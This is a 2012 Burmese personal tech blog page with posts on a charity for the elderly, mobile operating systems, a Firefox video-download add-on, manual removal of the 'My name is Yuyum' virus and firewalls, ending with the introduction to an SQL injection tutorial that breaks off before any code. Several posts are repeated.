ဒီပို႔ေလးကို ကြ်န္ေတာ္က မသိေသးသူေတြအတြက္ေရးလိုက္တာပါ၊ကဲ အဆင္ေၿပပါေစလို႕ဆုေတာင္းပါတယ္..........
Monday, May 28, 2012
အဘိုးအဘြားေတြအတြက္ပါ......................
Save the Aged ဘိုးဘြားရိပ္သာအတြက္ ေပ 40x60 ေျမကြက္ကို ဒဂံု(ဆိပ္ကမ္း)ဘက္မွာ ဒီေန႕ပဲ ၀ယ္ယူခဲ့လိုက္ၿပီ ... ဘိုးဘြားရိပ္သာဆက္လက္တည္ေဆာက္ေရးအတြက္ အလွဴေတြအမ်ားအျပားကိုလည္း ဖိတ္ေခၚအပ္ပါသည္။ www.savetheaged.ning.com
ကြ်န္ေတာ္ က တတ္ႏိုင္တဲ႕ ဘက္က ကုသိုလ္ ၀င္ယူတာပါ၊အဘိုးအဘြားေတြဗ်ာ ကူညီၾကပါ။
ကြ်န္ေတာ္ က တတ္ႏိုင္တဲ႕ ဘက္က ကုသိုလ္ ၀င္ယူတာပါ၊အဘိုးအဘြားေတြဗ်ာ ကူညီၾကပါ။
Friday, May 25, 2012
Window 7 မွာ အလုပ္လုပ္တဲ႕ အသံထြက္တဲ႕နာရီေလး.......................
ဒါကေတာ႕ Window7 မွာသံုးတဲ႕ နာရီေလးပါ ၊အသံပါထြက္ေပးတယ္၊ကြ်န္ေတာ္ေတာ႕ၾကိဳက္တယ္ေတာ္ေတာ္ေလးကို၊သူငယ္ခ်င္းတို႕လိုခ်င္ရင္ ဒီမွာႏွိပ္ၿပီးယူလိုက္ပါေနာ္..........................
Tuesday, May 15, 2012
Mobile operating system မ်ားကိုသိသေလာက္ေၿပာၿပမယ္.........
Mobile operating system လို႕လူသိမ်ားတဲ႕ မိုဘိုင္း OS ေတြပာာ ကြန္ပ်ဴတာမွာ အလုပ္လုပ္ဖို႕ထည္႕
ေပးထားတဲ႕ OS ေတြလိုပါဘဲ(ဥပမာ- microsoft Window) ေပါ႕၊အဲဒါနဲ႕ Operating system ကိုရွင္းရွင္းလင္း
လင္းၿမင္ေအာင္ေၿပာရမယ္ဆိုရင္ ကြန္ပ်ဴတာက ကြ်န္ေတာ္တို႕ခႏၵာကိုယ္ လိုဘဲ Hardwares ေတြထည္႕ထား
တဲ႕ပံုးၾကီးက ကိုယ္ခႏၵာၾကီးေပါ႕ဗ်ာ အခြံ႕ၾကီးေလ ၊ Operating system ကေတာ႕ ၀ိညာဥ္ေပါ႕ ပာီးးးးးးးးးးး
သူမရွိရင္ဘာမွလုပ္မရဘူး၊အဲလိုအလုပ္လုပ္တယ္ဗ်ာ၊ကြန္ပ်ဴတာ OS နဲ႕မိုဘိုင္း OS တို႕ပာာ သေဘာတရားခ်င္း တူညီေပမယ္႕ သဘာ၀ခ်င္းေတာ႕ကြဲၿပားပါတယ္၊မုိဘိုင္း OS ေတြကိုစမတ္ဖုန္း၊PDA ေတြ
နဲ႕Tablet ေတြမွာဘဲသံုးစြဲၾကပါတယ္။
သမိုင္း
မိုဘိုင္း device ေတြပာာ Google,microsoft နဲ႕ Apple တို႕လို႕ ကုမၼဏီၾကီးေတြအၾကိတ္အႏွယ္ယွဥ္ၿပိဳင္မႈေတြ အၿပင္ nokia,Research In Motion(RIM) နဲ႕Palm တို႕လို
မိုဘိုင္းေလာကထဲက ဦးေဆာင္ကုမၼဏီၾကီးေတြေၾကာင္႕ တစ္ပာုန္ထိုးတိုးတတ္ေအာင္ၿမင္လာတာၿဖစ္ပါ
တယ္၊၂၀၀၇ ခုႏွစ္ကေတာ႕ မိုဘိုင္းနည္းပညာအတြက္စိတ္လႈပ္ရွားဖြယ္ရာႏွစ္ၿဖစ္ခဲ႕ပါတယ္၊အဲဒီႏွစ္မွာ Apple ပာာ iPhone ကို ေစ်းကြက္ထဲၿဖန္႕ခ်ိတ႕အခါမွာေတာ႕ စမတ္ဖုန္း OS ေတြရဲ႕ ေခတ္သစ္တံခါးကို
ဖြင္႕ေပးလိုက္သလိုဘဲ ၿဖစ္လာပါေတာ႕တယ္၊သံုးစြဲသူေတြရဲ႕အေတြ႕အၾကံဳနဲ႕ Touch အေၿခအေနစနစ္ေပၚ
မႈတည္ၿပီး Apple က ဒီ OS ကို ထည္႕သြင္းထားတာပါ။၂၀၀၇ ခုႏွစ္ ႏို၀င္ဘာမွာgoogle က ေပာာ႕၀ဲလ္၊
ေဆာ႕၀ဲလ္နဲ႕တယ္လီကြန္း ကုမၼဏီ ၇၉ ခုနဲ႕မပာာမိတ္ၿပဳလုပ္ၿပီး Android လို႕ အမည္ရတဲ႕OS ကိုေမြးဖြား
ခဲ႕ပါတယ္။
စမတ္ဖုန္းMobile operating system မ်ား
စမတ္ဖုန္းေတြမွာေတြ႕ၿမင္ႏိုင္တဲ႕ OS ေတြကေတာ႕ Nokia ရဲ႕Symbian,Google ရဲ႕ Android,Apple ရဲ႕
iOS,RIM ရဲ႕ Blackberry,Microsoft ရဲ႕window phone,Linux,HPရဲ႕ WebOS,Samsung ရဲ႕ Ba da,Nokia
ရဲ႕ meemo နဲ႕ Mee Go စသည္႕တို႕ၿဖစ္ပါတယ္။
Android ,Bada,WebOS နဲ႕Maemoတို႕ပာာ opensource OS ၿဖစ္တဲ႕Linux ေပၚမွာအေၿခခံတည္ေဆာက္
ထားတာၿဖစ္ပါတယ္၊Apple ရဲ႕ iOS နဲ႕ပာာ BSD နဲ႕NexTsTE ဆိုတဲ႕ operating system တို႕အေပၚမွာ
အေၿခခံတည္ေဆာက္ထားတာၿဖစ္ပါတယ္။ BSD နဲ႕NexTsTE ကလည္း Unix လို႕ေခၚတဲ႕႔ OSအေပၚမွာ
အေၿခခံထားတာၿဖစ္ပါတယ္။
Symbian
Nokia ကုမၼဏီက ၂၀၀၈ ခုႏွစ္ ဒီဇင္ဘာမွာ symbian ltd. ကို ၀ယ္ယူခဲ႔ၿပီးမိုဘိုင္းေလာကထဲမွာ symbian က လူသိမ်ားလာခဲ႕ပါတယ္၊symbian ပာာ C++ programming နဲ႕ေရးစြဲထားတာၿဖစ္ပါတယ္၊၂၀၁၁ခုႏွစ္
ဧၿပီမွာ update လုပ္လိုက္တာကေတာ႕ symbian ^3 ၿဖစ္ၿပီး၊နာမည္ကေတာ႕ symbian anna ၿဖစ္ပါတယ္။
Android
Google ကုမၼဏီပာာ ၂၀၀၅ ခုႏွစ္မွာ Android Inc. ကို၀ယ္ယူၿပီးမိုဘိုင္းေလာက ထဲကိုေၿခလွမ္းဖို႕ၿပင္လာခဲ႕
ပါတယ္ C programming ကို အဓိကထားေရးသားၿပီး၊JAVA ကိုUI ေနရာမွာအသံုးၿပဳေရးဆြဲထားတာၿဖစ္ပါ
တယ္၊၂၀၁၁ ေဖဖ၀ါရီမွာေတာ႕ tablets အတြက္ 3.1(Honeycomb)နဲ႕ဖုန္းေတြအတြက္ 2.3.4(Gingerbread)ၿဖစ္ပါတယ္။
Apple
Apple ပာာ ၂၀၀၇ မွာ ေစ်းကြက္ထဲကိုစတင္ၿဖန္႕ခ်ိခဲ႕ၿပီးလူၾကိဳက္မ်ားတဲ႕ OS ၿဖစ္ပါတယ္၊C programming
ကိုအဓိကထားေရးသားၿပီး Object C program ကိုလည္းအားၿပဳထားပါတယ္၊Mac OS X နဲ႕ BSD OS အႏြယ္၀င္ၿဖစ္ပါတယ္။
BlackBerry
Research In Motion ကေနမိုဘိုင္းဖုန္းေတြမွာ သံုးစြဲႏိုင္မယ္႕ OS ကိုၿဖန္႕ခ်ိလိုက္တာပါ၊C++ programming နဲ႕ေရးဆြဲထားၿပီး၊ေနာက္ဆံုးထြက္ကေတာ႕ Blackberry 7 ၿဖစ္ပါတယ္။
Window phone
မိုက္ကရိုေဆာ႕ဖ္ ကမိုဘိုင္းေလာကကို window phone 7 နဲ႕ထိုးေဖာက္လာပါတယ္၊မိုက္ကရုိေဆာ႕ဖ္ရဲ႕
window mobile ပလက္ေဖာင္းမွာေတာ႕ သူကနာမည္ၾကီး OS ၿဖစ္ပါတယ္။
ကဲ...............ကြ်န္ေတာ္ မွတ္မိသမွ် ဖတ္မိသမွ်ေလးေတြပါ၊ကြ်န္ေတာ္မေတာ္ပါ၊ကြ်န္ေတာ္ပညာရွင္မပာုတ္ပါ၊ကြ်န္ေတာ္ သိသမွ်သာမွ်ေ၀တာပါ။အားလံုးကိုေက်းဇူးတင္ပါတယ္။
Monday, May 14, 2012
Youtube/Facebook မွ videos မ်ားကို mozillafirefox ၏ add-0n အသံုးၿပဳ၍ download ဆြဲၿခင္း...........
ကြ်န္ေတာ္ ဒီပာာေလးကို ေရးမယ္ေရးမယ္နဲ႕မေရးၿဖစ္တာပါ၊တခ်ိဳ႕လူေတြလည္းသိၿပီးၿဖစ္ေနမွာပါ၊ဒါေပမယ္႕
facebook/youtube က videos ေတြဘယ္လို download ဆြဲရမွန္းမသိဘူးလို႕ေၿပာေနၾကသူေတြရွိေနေသး
ပါတယ္၊ကဲ...........မသိေသးတဲ႕ ေဘာ္ဒါေတြအတြက္ပါ။ ဒီ add-on ေလးက Video DownloadHelper ::
ဆိုတာေလးပါ၊အသံုးၿပဳရ အရမ္းလြယ္ပါတယ္ ၾကယ္ေလးပြင္႕ရထားၿပီး အသံုးၿပဳသူေပါင္း 7,204,137 ရွိပါတယ္
ကဲ..............ဒါေလးကိုထည္႕ဖို႕ ဒီမွာႏွိပ္ပါ
+ Add to firefox ကို ကလစ္ႏွိပ္ပါ ၊install လုပ္ပါ၊ေနာက္ၿပီး firefox က restart ေတာင္းပါလိမ္႕မယ္၊restart ေပးလိုက္ပါ၊ၿပန္တတ္လာတဲ႕အခါမွာ mozilla firefox ရဲ႕ ဘယ္ဘက္
အေပၚမွာ ေဘာလံုးေလးသံုးလံုးေတြ႕ၿပီေပါ႕ဗ်ာ အဲဒါက အနက္ေရာင္ေလးၿဖစ္ေနမယ္၊ေဒါင္းလုပ္ ဆြဲလို႕ရ
တဲ႕ဖိုင္ေလးေတြေတြ႕မွာသူက လည္ေနမွာ၊ ဒါဆို Youtube ဖြင္႕လိုက္ပါ..... ေနာက္ၿပီး ကိုယ္႕ download
လုပ္မယ္႕ video ကို ကလစ္လုပ္လိုက္ပါ.......... ေအာ္.......ေဘာ္လံုးေလးတတ္လာၿပီေနာ္
ေဘာ္လံုးေလးရဲ႕ေဘးမွာ ကြ်န္ေတာ္ကေတာ႕ စမူဆာ ေဇာက္ထိုးေလး ကိုႏွိပ္လိုက္ပါ၊ကဲ....ဒါဆိုကိုယ္႕လို
ခ်င္တဲ႕သီခ်င္းနာမည္ေလးေတြ႕လိမ္႕မယ္ ႏွိပ္လိုက္ပါဗ်ာ.............. ေဒါင္းလုပ္လုပ္ေနတာေတြ႕လိမ္႕မယ္၊
အားလံုးအဆင္ေၿပပါေစ အဆင္မေၿပတာရွိရင္ satanmokar@gmail.com ကို ေမးႏိုင္ပါတယ္.......
facebook/youtube က videos ေတြဘယ္လို download ဆြဲရမွန္းမသိဘူးလို႕ေၿပာေနၾကသူေတြရွိေနေသး
ပါတယ္၊ကဲ...........မသိေသးတဲ႕ ေဘာ္ဒါေတြအတြက္ပါ။ ဒီ add-on ေလးက Video DownloadHelper ::
ဆိုတာေလးပါ၊အသံုးၿပဳရ အရမ္းလြယ္ပါတယ္ ၾကယ္ေလးပြင္႕ရထားၿပီး အသံုးၿပဳသူေပါင္း 7,204,137 ရွိပါတယ္
ကဲ..............ဒါေလးကိုထည္႕ဖို႕ ဒီမွာႏွိပ္ပါ
+ Add to firefox ကို ကလစ္ႏွိပ္ပါ ၊install လုပ္ပါ၊ေနာက္ၿပီး firefox က restart ေတာင္းပါလိမ္႕မယ္၊restart ေပးလိုက္ပါ၊ၿပန္တတ္လာတဲ႕အခါမွာ mozilla firefox ရဲ႕ ဘယ္ဘက္
အေပၚမွာ ေဘာလံုးေလးသံုးလံုးေတြ႕ၿပီေပါ႕ဗ်ာ အဲဒါက အနက္ေရာင္ေလးၿဖစ္ေနမယ္၊ေဒါင္းလုပ္ ဆြဲလို႕ရ
တဲ႕ဖိုင္ေလးေတြေတြ႕မွာသူက လည္ေနမွာ၊ ဒါဆို Youtube ဖြင္႕လိုက္ပါ..... ေနာက္ၿပီး ကိုယ္႕ download
လုပ္မယ္႕ video ကို ကလစ္လုပ္လိုက္ပါ.......... ေအာ္.......ေဘာ္လံုးေလးတတ္လာၿပီေနာ္
ေဘာ္လံုးေလးရဲ႕ေဘးမွာ ကြ်န္ေတာ္ကေတာ႕ စမူဆာ ေဇာက္ထိုးေလး ကိုႏွိပ္လိုက္ပါ၊ကဲ....ဒါဆိုကိုယ္႕လို
ခ်င္တဲ႕သီခ်င္းနာမည္ေလးေတြ႕လိမ္႕မယ္ ႏွိပ္လိုက္ပါဗ်ာ.............. ေဒါင္းလုပ္လုပ္ေနတာေတြ႕လိမ္႕မယ္၊
အားလံုးအဆင္ေၿပပါေစ အဆင္မေၿပတာရွိရင္ satanmokar@gmail.com ကို ေမးႏိုင္ပါတယ္.......
Sunday, April 22, 2012
ေတာင္းပန္တာၿဖစ္ပါတယ္.....................
ကြ်န္ေတာ္အခုေက်ာင္းကတစ္ဖက္၊အလုပ္ကတစ္ဖက္နဲ႕ၿဖစ္တာေၾကာင္႕ ဘေလာ႕ အသစ္မတင္ၿဖစ္ပါဘူး၊
ကြ်န္ေတာ္သူငယ္ခ်င္းအားလံုးကိုေတာင္းပန္ပါတယ္၊နားလည္ေပးပါ၊ကြ်န္ေတာ္ အခုသီခ်င္းေတြလည္းလုပ္
ေနလို႕ပါ၊ပာီးးးးးးးး အဆိုေတာ္ကလည္းၿဖစ္ခ်င္ေသးတာကိုးဗ်၊ဒါေပမယ္႕ ဘေလာ႕ကို ကြ်န္ေတာ္ အားရင္ေရး
မွာပါ၊ေနာက္ ကိုဖိုးေအး အကူညီေတာင္းထားတဲ႕ဖုန္းကိစၥကြ်န္ေတာ္သိပ္မရွင္းဘူး၊aungmoekyaw.talk7@gmail.com
ကို ေမးလ္ပို႕ၿပီၤးအေသးစိတ္ေၿပာၿပေပးပါ၊တတ္သေလာက္သိသေလာက္ေၿပာၿပေပးပါ႕မယ္၊လာလည္တဲ႕
သူငယ္ခ်ုင္းအားလံုးေက်းွဇူးတင္ပါတယ္
ကြ်န္ေတာ္သူငယ္ခ်င္းအားလံုးကိုေတာင္းပန္ပါတယ္၊နားလည္ေပးပါ၊ကြ်န္ေတာ္ အခုသီခ်င္းေတြလည္းလုပ္
ေနလို႕ပါ၊ပာီးးးးးးးး အဆိုေတာ္ကလည္းၿဖစ္ခ်င္ေသးတာကိုးဗ်၊ဒါေပမယ္႕ ဘေလာ႕ကို ကြ်န္ေတာ္ အားရင္ေရး
မွာပါ၊ေနာက္ ကိုဖိုးေအး အကူညီေတာင္းထားတဲ႕ဖုန္းကိစၥကြ်န္ေတာ္သိပ္မရွင္းဘူး၊aungmoekyaw.talk7@gmail.com
ကို ေမးလ္ပို႕ၿပီၤးအေသးစိတ္ေၿပာၿပေပးပါ၊တတ္သေလာက္သိသေလာက္ေၿပာၿပေပးပါ႕မယ္၊လာလည္တဲ႕
သူငယ္ခ်ုင္းအားလံုးေက်းွဇူးတင္ပါတယ္
Sunday, March 4, 2012
My name is Yuyum အမည္ ၿဖင္႕ virus တစ္မ်ဴိ္းထြက္ရွိ…………
My name is Yuyum အမည္ၿဖင္႕ virus တစ္မ်ဴိးေပၚထြက္ေနတယ္လို႕ အင္တာနက္
ဂ်ာနယ္
အတြဲ(၁၃) အမွတ္(၄) ၾကာသပေတးေန႕၊ဇန္န၀ါရီ(၂၆)ရက္၊၂၀၁၂ခုႏွစ္ မွာေဖာ္ၿပထားပါတယ္။အဆိုပါ
Virus သည္ ကြန္ပ်ဴတာအား ခ်က္ခ်င္းပ်က္စီးေစတာမပာုတ္ဘဲ၊ကြန္ပ်ဴတာအတြင္းရွိ
မူရင္းဖိုင္မ်ားကိုပြား
ကာ ကြန္ပ်ဴတာအားေလးလံေအာင္ၿပဳလုပ္ပါတယ္။ကြန္ပ်ဴတာတြင္ အဆိုပါ virus ၀င္ေနပါက My
Documents
ေအာက္တြင္ My name is Yuyum.rtf ႏွင္႕ BacaAQ.rtf
ဖိုင္ႏွစ္ခုတည္ေဆာက္မည္ၿဖစ္ၿပီး၊ကြန္ပ်ဴတာ
အတြင္းရွိ အၿခား folder မ်ားကိုလည္း အၿခားအမည္မ်ားၿဖင္႕
ပံုတုမ်ားတည္ေဆာက္မည္ၿဖစ္သည္၊အဆို
ပါ virus မိမိကြန္ပ်ဴတာတြင္ ၀င္ေရာက္ပါက စက္သည္သိသိသာသာ ေႏွးေကြးလာမည္ၿဖစ္ပါသည္၊
My name is Yuyum virus ကို သတ္မယ္ဆိုရင္ေတာ႕ task manager
ကိုေခၚပါ(ctrl+alt+del)
Window7 မွာဆိုရင္ေတာ႕(Ctrl+Alt+Del) ကိုႏွိပ္ Start Task Manager ကို ေရြးၿပီး ကလစ္ပါ
၊ေနာက္
Processes ေအာက္က wscript.exe ကို end process လုပ္ပါ၊ေနာက္ system configuration
သို႕၀င္ေရာက္
ကာ :Microsoft Office Update ႏွင္႕ Database ႏွစ္ခုလံုးကို Disable လုပ္ပါ။ထိုသို႕ ဖ်က္ၿပီးပါက
D: (သို႕)
E: အတြင္းမွ Diskeeper ဖိုင္ကို ဖ်က္ရမည္ၿဖစ္သည္ ၊ထိုသို႕ၿပဳလုပ္ၿပီးပါက window search
အတြင္းမွ
*.inf ကို ရုိက္ၿပီးရွာလိုက္ပါ auto run ဖိုင္မ်ားေပၚလာမည္ၿဖစ္သည္၊ဒီဖိုင္ေတြကို Shift+Del
ႏွိပ္ကၿပီးဖ်က္
ရပါမယ္၊ဒါဆို ကြန္ပ်ဴတာကို ကူးစက္ၿခင္းရပ္တန္႕သြားမည္ၿဖစ္သည္။ေနာက္ window search တြင္
*.rtf
ရိိုက္ၿပီးရွာလိုက္ပါ ဖိုင္မ်ားေပၚလာပါလိမ္႕မယ္၊ထိုဖိုင္မ်ားအတြင္းမွ My name is Yuyum.rtf ႏွင္႕
BacaAQ.rtf
မ်ားကို Shift+Del ႏွိပ္ကာ ဖ်က္ရပါမယ္၊ေနာက္တစ္ဆင္႕ အေနနဲ႕ေတာ႕ virus မွ
ၿပဳလုပ္ထားေသာဖိုင္အတု
မ်ားကိုဖ်က္ရမည္ၿဖစ္သည္ ထိုဖိုင္မ်ားကို ဖ်က္ရန္အတြက္ *.lnk
ရိုက္ကာရွာလိုက္ပါ၊ေပၚလာေသာဖိုင္မ်ားမွ
Microsoft အမည္ၿဖင္႕မလိုအပ္ေသာဖိုင္မ်ားကို Shift+Del ႏွိပ္ၿပီးဖ်က္လိုက္ပါက virus
ကင္းစင္သြားၿပီၿဖစ္
သည္္၊
ဒါက anti-virus တင္ထားေသာစက္မ်ားတြင္ update ၿပဳလုပ္ကာ
သတ္ႏိုင္ပါတယ္။ေၿပာေနၾကအတိုင္းဘဲ
အဆင္ေၿပပါေစဗ်ာ။
ဂ်ာနယ္
အတြဲ(၁၃) အမွတ္(၄) ၾကာသပေတးေန႕၊ဇန္န၀ါရီ(၂၆)ရက္၊၂၀၁၂ခုႏွစ္ မွာေဖာ္ၿပထားပါတယ္။အဆိုပါ
Virus သည္ ကြန္ပ်ဴတာအား ခ်က္ခ်င္းပ်က္စီးေစတာမပာုတ္ဘဲ၊ကြန္ပ်ဴတာအတြင္းရွိ
မူရင္းဖိုင္မ်ားကိုပြား
ကာ ကြန္ပ်ဴတာအားေလးလံေအာင္ၿပဳလုပ္ပါတယ္။ကြန္ပ်ဴတာတြင္ အဆိုပါ virus ၀င္ေနပါက My
Documents
ေအာက္တြင္ My name is Yuyum.rtf ႏွင္႕ BacaAQ.rtf
ဖိုင္ႏွစ္ခုတည္ေဆာက္မည္ၿဖစ္ၿပီး၊ကြန္ပ်ဴတာ
အတြင္းရွိ အၿခား folder မ်ားကိုလည္း အၿခားအမည္မ်ားၿဖင္႕
ပံုတုမ်ားတည္ေဆာက္မည္ၿဖစ္သည္၊အဆို
ပါ virus မိမိကြန္ပ်ဴတာတြင္ ၀င္ေရာက္ပါက စက္သည္သိသိသာသာ ေႏွးေကြးလာမည္ၿဖစ္ပါသည္၊
My name is Yuyum virus ကို သတ္မယ္ဆိုရင္ေတာ႕ task manager
ကိုေခၚပါ(ctrl+alt+del)
Window7 မွာဆိုရင္ေတာ႕(Ctrl+Alt+Del) ကိုႏွိပ္ Start Task Manager ကို ေရြးၿပီး ကလစ္ပါ
၊ေနာက္
Processes ေအာက္က wscript.exe ကို end process လုပ္ပါ၊ေနာက္ system configuration
သို႕၀င္ေရာက္
ကာ :Microsoft Office Update ႏွင္႕ Database ႏွစ္ခုလံုးကို Disable လုပ္ပါ။ထိုသို႕ ဖ်က္ၿပီးပါက
D: (သို႕)
E: အတြင္းမွ Diskeeper ဖိုင္ကို ဖ်က္ရမည္ၿဖစ္သည္ ၊ထိုသို႕ၿပဳလုပ္ၿပီးပါက window search
အတြင္းမွ
*.inf ကို ရုိက္ၿပီးရွာလိုက္ပါ auto run ဖိုင္မ်ားေပၚလာမည္ၿဖစ္သည္၊ဒီဖိုင္ေတြကို Shift+Del
ႏွိပ္ကၿပီးဖ်က္
ရပါမယ္၊ဒါဆို ကြန္ပ်ဴတာကို ကူးစက္ၿခင္းရပ္တန္႕သြားမည္ၿဖစ္သည္။ေနာက္ window search တြင္
*.rtf
ရိိုက္ၿပီးရွာလိုက္ပါ ဖိုင္မ်ားေပၚလာပါလိမ္႕မယ္၊ထိုဖိုင္မ်ားအတြင္းမွ My name is Yuyum.rtf ႏွင္႕
BacaAQ.rtf
မ်ားကို Shift+Del ႏွိပ္ကာ ဖ်က္ရပါမယ္၊ေနာက္တစ္ဆင္႕ အေနနဲ႕ေတာ႕ virus မွ
ၿပဳလုပ္ထားေသာဖိုင္အတု
မ်ားကိုဖ်က္ရမည္ၿဖစ္သည္ ထိုဖိုင္မ်ားကို ဖ်က္ရန္အတြက္ *.lnk
ရိုက္ကာရွာလိုက္ပါ၊ေပၚလာေသာဖိုင္မ်ားမွ
Microsoft အမည္ၿဖင္႕မလိုအပ္ေသာဖိုင္မ်ားကို Shift+Del ႏွိပ္ၿပီးဖ်က္လိုက္ပါက virus
ကင္းစင္သြားၿပီၿဖစ္
သည္္၊
ဒါက anti-virus တင္ထားေသာစက္မ်ားတြင္ update ၿပဳလုပ္ကာ
သတ္ႏိုင္ပါတယ္။ေၿပာေနၾကအတိုင္းဘဲ
အဆင္ေၿပပါေစဗ်ာ။
Firewall ဆိုသည္မွာ………
အင္တာနက္ သည္ တစ္ကမာၻလံုးတြင္ ကြန္ပ်ဴဳတာ သန္းေပါင္းမ်ားစြားၿဖင္႕ ခ်ိတ္ဆက္ထားေသာ network
ၾကီးၿဖစ္သည္၊အသံုးၿပဳသူလည္းအမ်ားအၿပားရွိေပသည္၊ အင္တာနက္ေပၚမွာ လူအမ်ဴိးရွိပါတယ္
လူအမ်ဴိးမ်ဴိးစိတ္အေထြဆိုသည္႕ အတိုင္း လူေကာင္းမ်ားရွိသလို တစ္ခါတေလ အဖ်က္ေလးေတြလုပ္တတ္
ပညာရွင္(Hacker) မ်ားလည္းရွိပါတယ္၊၄င္းပညာရွင္ တို႕ဖန္တီးထားေသာ virus မ်ား၊ကြ်န္ေတာ္တို႕ရဲ႕ကိုယ္
ေရးအခ်က္အလက္ မ်ားကို ခိုးယူမယ္႕ Trojan မ်ား က နည္းပညာအသံုးၿပဳသူတိုင္းကို တိုက္ခိုက္ေနတယ္
ဆိုတာလည္း ကြန္ပ်ဴတာ မေတာက္တေခါက္မ်ားမွ ပညာရွင္မ်ားအထိ သိပါတယ္၊ကြ်န္ေတာ္တို႕ရဲ႕ အခ်က္အ
လက္ေတြကို တၿခားလူေတြ ခုိးယူလို႕မရေအာင္ ကာကြယ္ေပးဖို႕ အတြက္ ကြန္ပ်ဴတာနဲ႕အင္တာနက္ၾကားမွာ
အတားအစီး တစ္ခုကို Firewall လို႕ေခၚပါတယ္။အရွင္းဆံုးေၿပာရရင္ ကြ်န္ေတာ္တို႕ ကုန္တိုက္ေတြမွာ ေစာင္႕
တဲ႕အေစာင္႕နဲ႕တူတယ္၊သူက သူ႔စီ၀င္လာတဲ႕လူေတြကိုလည္း စစ္တယ္ ၊ၿပန္ထြက္သြားတဲ႕လူေတြကိုလည္း
ေသေသခ်ာခ်ာ ၾကည္႕ရႈၿပီး သံသယ ရွိသူေတြကိုေပးမထြက္၊ေပးမ၀င္ဘူးေလ၊Firewall ကလည္း ကြန္ပ်ဴတာ
ထဲကို၀င္လာတဲ႕ data (သို႕) ထြက္သြားတဲ႕ data ေတြက firewall ကိုၿဖတ္သန္းသြားရပါတယ္၊ပံုမွန္မပာုတ္
တဲ႕data ေတြကို ၀င္ထြက္ခြင္႕မေပးပါဘူး ၊ဒါေၾကာင္း ပာက္ကာ မ်ားက ကြ်န္ေတာ္တို႕ရဲ႕ ကြန္ပ်ဴတာကို
ထိန္းခ်ဴပ္ၿခင္း ခိုးယူၿခင္းဖ်က္စီးၿခင္းကို firewall က အေတာ္အသင္႕ကာကြယ္ႏိုင္ပါတယ္၊ကြ်န္ေတာ္ေၿပာတာ
အေတာ္အသင္႕ေနာ္ firewall ကာကြယ္ ထားလို႕100%လုံၿခံဳၿပီလို႕မေၿပာဘူးေနာ္၊အဆိုးဆံုးေတြၿဖစ္မလာ
ေတာ႕တာေပါ႕၊ Firewall ႏွစ္မ်ဴိးရွိတယ္ဗ် Hardware firewall နဲ႕ Software firewall ဆိုၿပီးေတာ႕ေပါ႔၊
Hardware firewall က hub တို႕ switch တို႕လို အင္တာနက္ နဲ႕ မိမိတို႕ရဲ႕ network ၾကားမွာတတ္ဆင္
အသံုးၿပဳရတဲ႕ device ၿဖစ္ပါတယ္၊အခုဆို ခလုတ္ေလးတစ္ခ်က္ႏွိပ္လိုက္တာနဲ႕ လံုၿခံဳေရး တိုးၿမွင္႕လို႕ရ
တဲ႕ device ေတြရွိေနပါၿပီ၊Software firewall ကေတာ႕ ကြန္ပ်ဴတာမွ install ၿပဳလုပ္ရတဲ႕ program တစ္
မ်ဴ္ိးၿဖစ္ပါတယ္၊ဒီ firewall ကိုသာ install လုပ္ထားမယ္ဆိုရင္ ကြ်န္ေတာ္ တို႕ရဲ႕ကြန္ပ်ဴတာကို ၀င္/ထြက္
သမွ် datas ေတြကို ေစာင္႕ၾကည္႕ စစ္ေဆးၿပီး ၀င္ခြင္႕၊ထြက္ခြင္႕ကို ဆံုးၿဖတ္ေပးမွွာၿဖစ္ပါတယ္၊ install
လုပ္ထားတဲဲ႕ကြန္ပ်ဴတာကိုသာ ကာကြယ္ေပးတဲ႕ကြန္ပ်ဴတာကို personal firewall လို႕ေခၚပါတယ္၊window ေတြမွာလည္း
firewall built-in ပါရွိပါတယ္၊ဒါေပမယ္႕ ကြ်န္ေတာ္တို႕ ၿမန္မာႏိုင္ငံမွာ အသံုးၿပဳေနတဲ႕
Window ေတာ္ေတာ္မ်ားမ်ား က update လုပ္လို႔မရတဲ႕ ကူးလိုင္စင္ေတြၿဖစ္လို႕ မလံုၿခံဳပါဘူး၊အေတာ္
အသင္႕ဘဲကာကြယ္ႏိုင္ပါတယ္၊ေနာက္ၿပီးဘယ္ေလာက္ဘဲေကာင္းတဲ႕ firewall သံုးသံုး လိုင္စင္
Window ဘဲသံုးသံုး ကြ်န္ေတာ္တို႕ ကိုယ္တိုင္ ခြင္႕ၿပဳေပးလိုက္တဲ႕ files ေတြထဲမွာ virus/Trojan
ပါေနရင္ေတာ႕ ကာကြယ္ႏိုင္မွာမပာုတ္ပါဘူး၊ကိုယ္တိုင္လက္ခံလိုက္တဲ႕အတြက္ ကိုယ္တိုင္တာ၀န္
ယူရပါလိမ္႕မယ္။
ကဲ…………. ဒီ post ေလးကိုဒီမွာ ေတာ္လိုက္ေတာ႕မယ္ ကြ်န္ေတာ္နားလည္သေလာက္ေလးရွင္းၿပတာပါ
အမွားပါရင္လည္း ခြင္႕လြတ္ပါေနာ္၊ဒီထက္လည္းၾကိဳးစားၿပီးေရးသားမွာပါ။
Injection အေၾကာင္းသိသမွ်............
--- မိတ္ဆက္---
Injection နဲ႔ပက္သက္တဲ႔အပုိင္းကုိ အေတြ႔အၾကံဳ မရင့္က်က္ေသးတဲ႔သူေတြ၊ အေတြ႔အၾကံဳရွိၿပီးတဲ႔သူေတြပါ နားလည္ႏုိင္ေအာင္ ကၽြန္ေတာ့္ရဲ႕ အၿမင္နဲ႔ နဲနဲေလာက္ Tutorial တစ္ခုအၿဖင့္ေရးသားလုိက္ပါတယ္။ SQL injectiong နဲ႔ပက္သက္တဲ႔ Tutorial ေတြကုိ Google မွာ ရွာၾကည့္လုိက္ပါက ေတာင္လုိပုံေနပါတယ္။ အားလုံးကေတာ့ အတူတူပါပဲ... SQL injector ေတြၿဖစ္ေစရန္တစ္ခုအတြက္မဟုတ္ပဲ SQL Injection နဲ႔အတူ php နဲ႔ mysql functions ေလးေတြကုိ သိကာ security ပုိင္းကုိ ထိန္းသိန္းကာကြယ္ႏုိင္ရန္အတြက္ ရည္ရြယ္၍ Computer ေ၀ါဟာရကုိ ၿမန္မာလုိ တုိက္ရုိက္ဘာသာၿပန္ရတာ နဲနဲေတာ့ နားရႈပ္သြားႏုိင္မယ္။ ဒါေပမဲ႔ အတတ္ႏုိင္ဆုံးေတာ့ နားလည္ေအာင္ ရွင္းၿပေပးလုိက္ပါတယ္။ SQL Injection ကုိေလ့လာတဲ႔အခါမွာ အေၿခခံ Web Developement ပုိင္းအေၿခခံရွိဖု႔ိေတာ့လိုပါလိမ့္မယ္.. ဒီ tutorial အတြက္ လုိအပ္တာကေတာ့ php 